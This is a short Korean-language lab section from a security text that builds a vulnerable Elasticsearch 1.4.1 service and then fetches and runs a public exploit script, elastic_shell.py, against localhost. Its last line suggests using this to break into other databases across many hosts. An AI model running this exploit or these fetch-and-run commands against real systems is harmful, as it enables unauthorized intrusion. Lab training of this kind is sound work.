3.8.1 Elastic Search 실습
취약한 Elastic Search 서비스를 구축해 테스트하려면, 다음 과정을 따라 설치해야 한다.
update-java-alternatives --jre -s java-1.7.0-openjdk-i386
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.1.zip
unzip elasticsearch-1.4.1.zip
cd elasticsearch-1.4.1/bin/
./plugin -i elasticsearch/marvel/latest
./elasticsearch
일단 elasticsearch가 실행되고 있으면, 공격 코드를 다운로드해 실행할 수 있다.
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/ElasticSearch/elastic_shell.py
chmod +x ./elastic_shell.py
python ./elastic_shell.py localhost
그리고 다른 데이터베이스에 침투해서 수많은 호스트에서 접근 권한을 획득할 수 있다.